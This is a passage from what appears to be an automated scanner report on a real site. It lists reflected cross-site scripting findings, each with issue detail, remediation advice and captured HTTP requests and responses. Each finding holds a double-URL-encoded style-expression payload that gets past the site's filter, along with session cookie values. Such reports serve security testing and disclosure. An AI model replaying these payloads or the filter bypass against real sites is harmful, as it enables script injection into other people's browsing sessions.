turnerlicensing.com/s.nl?sc=77&category=260131&dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1&dbb0f%27style%3d%27x%3aexpression%28alert%281%29%29%27eba22f9b445=1&dbb0f'style='x:expression(alert(1))'eba22f9b445=1&fromsla=T'>
...[SNIP]...

2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Florida

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:53 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -1699143552:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Florida</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175362&6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1&6608e'style='x:expression(alert(1))'462ed1390c5=1&6608e%27style%3d%27x%3aexpression%28alert%281%29%29%27462ed1390c5=1&fromsla=T'>
...[SNIP]...

2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Georgia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: -811335755:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=972
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110892


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Georgia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175363&cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1&cd6fd'style='x:expression(alert(1))'66d636fc045=1&cd6fd%27style%3d%27x%3aexpression%28alert%281%29%29%2766d636fc045=1&fromsla=T'>
...[SNIP]...

2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Hawaii

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 334650841:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98513


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hawaii</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=259733&8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1&8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5=1&8d2a5%27style%3d%27x%3aexpression%28alert%281%29%29%278b5f9f5f3a5=1&fromsla=T'>
...[SNIP]...

2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Idaho

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:07 GMT
NS_RTIMER_COMPOSITE: -1255238677:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 92858


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Idaho</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175364&1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1&1b675'style='x:expression(alert(1))'73c56e3d4b3=1&1b675%27style%3d%27x%3aexpression%28alert%281%29%29%2773c56e3d4b3=1&fromsla=T'>
...[SNIP]...

2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Illinois

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:21 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
NS_RTIMER_COMPOSITE: 778553075:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=845
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111147


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Illinois</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175365&a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1&a8939%27style%3d%27x%3aexpression%28alert%281%29%29%27a322cf42a27=1&fromsla=T&a8939'style='x:expression(alert(1))'a322cf42a27=1'>
...[SNIP]...

2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Indiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:15 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 2001998493:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110889


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Indiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175366&ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1&ddb83%27style%3d%27x%3aexpression%28alert%281%29%29%2731d9a9bbd80=1&ddb83'style='x:expression(alert(1))'31d9a9bbd80=1&fromsla=T'>
...[SNIP]...

2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Iowa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:13 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:09 GMT
NS_RTIMER_COMPOSITE: -1590883224:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=973
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110110


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Iowa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175368&7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1&7a3d8%27style%3d%27x%3aexpression%28alert%281%29%29%2757114ddf99c=1&7a3d8'style='x:expression(alert(1))'57114ddf99c=1&fromsla=T'>
...[SNIP]...

2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:06 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:04 GMT
NS_RTIMER_COMPOSITE: -1255239272:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=765
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kansas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175369&b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1&b1e4f'style='x:expression(alert(1))'77e22b95d60=1&fromsla=T&b1e4f%27style%3d%27x%3aexpression%28alert%281%29%29%2777e22b95d60=1'>
...[SNIP]...

2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kentucky

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:18 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1558098663:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=989
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110267


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kentucky</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175370&7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1&7860b'style='x:expression(alert(1))'bb84182b6d5=1&7860b%27style%3d%27x%3aexpression%28alert%281%29%29%27bb84182b6d5=1&fromsla=T'>
...[SNIP]...

2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Louisiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
